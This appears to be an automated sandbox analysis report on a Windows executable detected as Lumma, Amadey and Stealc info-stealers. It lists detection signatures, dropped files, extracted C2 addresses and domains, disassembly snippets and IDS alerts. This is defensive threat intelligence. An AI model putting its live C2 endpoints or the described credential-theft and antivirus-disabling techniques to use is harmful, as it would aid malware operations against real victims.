Windows Analysis Report
h3yRbjNWk1.exe

Overview

General Information

Sample name: h3yRbjNWk1.exe
renamed because original name is a hash value
Original sample name: 29c296c7b8335c9d6ee3215f5484c3e0.exe
Analysis ID: 1537094
MD5: 29c296c7b8335c9d6ee3215f5484c3e0
SHA1: c7c6db3624937daea2ba323c832ffcd4028b73a0
SHA256: 8b277787184b8ac7005df852203270a0808aca4b0d54f26e72fa3b1a2c478852
Tags: 32exe
Infos:

Detection

LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
PE file has a writeable .text section
Potentially malicious time measurement code found
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: h3yRbjNWk1.exe Avira: detected
Antivirus detection for URL or domain
Source: https://steamcommunity.com/profiles/76561199724331900 URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/inventory/ URL Reputation: Label: malware
Source: http://185.215.113.37/ URL Reputation: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\1000350002\6a8d4317d4.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 00000000.00000002.1721238447.00000000007C1000.00000040.00000001.01000000.00000003.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 15.0.num.exe.650000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: ea2c7beae0.exe.5744.7.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["licendfilteo.site", "studennotediw.store", "eaglepawnoy.store", "clearancek.site", "spirittunek.store", "bathdoomgaz.store", "mobbipenju.store", "dissapoiznw.store"], "Build id": "4SD0y4--legendaryy"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\1000350002\6a8d4317d4.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\num[1].exe ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe ReversingLabs: Detection: 44%
Multi AV Scanner detection for submitted file
Source: h3yRbjNWk1.exe ReversingLabs: Detection: 44%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\num[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\1000350002\6a8d4317d4.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: h3yRbjNWk1.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: h3yRbjNWk1.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49823 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49833 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49890 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49901 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49907 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49916 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49929 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49942 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49949 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49962 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49971 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:50001 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:50012 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:50018 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:50029 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:50037 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:50040 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:50041 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:50045 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:50047 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:50050 version: TLS 1.2
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 4af6eb3e1f.exe, 0000000C.00000003.2595479701.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, 4af6eb3e1f.exe, 0000000C.00000002.2730540172.0000000000312000.00000040.00000001.01000000.0000000B.sdmp
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Directory queried: number of queries: 1770
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh 7_2_00B799D0
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then mov eax, dword ptr [esp] 7_2_00B3D110
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then mov eax, dword ptr [esp] 7_2_00B3D110
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 7_2_00B3FCA0
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then mov eax, dword ptr [ebp-10h] 7_2_00B40EEC
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then mov eax, dword ptr [esp] 7_2_00B75700
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then mov eax, dword ptr [esi+20h] 7_2_00B46F91
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then movzx edx, byte ptr [esi+edi] 7_2_00B349A0
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h 7_2_00B73920
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h 7_2_00B4D961
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 7_2_00B442FC
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then jmp eax 7_2_00B41ACD
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then jmp eax 7_2_00B41A3C
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then movzx edx, byte ptr [esi+ebx] 7_2_00B35A50
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h 7_2_00B74A40
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 7_2_00B43BE2
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then mov eax, dword ptr [esp+40h] 7_2_00B41BEE
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then mov ebp, eax 7_2_00B3A300
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh 7_2_00B79B60
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then mov eax, dword ptr [esp] 7_2_00B79CE0
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh 7_2_00B79CE0
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h 7_2_00B5CCD0
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then mov eax, dword ptr [esp] 7_2_00B5CCD0
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], C85F7986h 7_2_00B5CCD0
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then mov dword ptr [esp], 00000000h 7_2_00B4B410
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then mov eax, dword ptr [esp+0Ch] 7_2_00B5C470
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then mov word ptr [eax], cx 7_2_00B4D457
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 7_2_00B46536
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then mov word ptr [eax], cx 7_2_00B59510
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then mov dword ptr [esp+1Ch], 5E46585Eh 7_2_00B5FD10
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then movzx ecx, word ptr [ebp+00h] 7_2_00B3BEB0
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then cmp byte ptr [ebx], 00000000h 7_2_00B46EBF
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then movzx edi, byte ptr [ecx+esi] 7_2_00B36EA0
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then mov eax, dword ptr [esp+40h] 7_2_00B41E93
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 4x nop then mov eax, dword ptr [esi+20h] 7_2_00B46F91

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49782 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.4:58049 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.4:64331 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.4:58875 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.4:54579 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.4:57941 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.4:54334 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.4:55382 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49793
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49825 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.4:58232 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49855 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49856 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.4:50684 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.4:55608 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.4:50775 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.4:59545 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.4:52126 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49878 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.4:53913 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.4:57439 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49913 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.4:53787 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.4:52039 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.4:56496 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.4:50607 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.4:57625 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49948 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49953 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.4:57965 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.4:56772 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.4:53116 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.4:63648 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.4:59869 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.4:61897 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49988 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.4:63891 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.4:53917 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49977 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.4:53570 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.4:58144 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50044 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.4:55499 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50049 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.4:53008 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49833 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49833 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49823 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49901 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49901 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49962 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:50001 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50012 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49907 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49907 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50012 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49890 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50040 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50018 -> 104.21.53.8:443
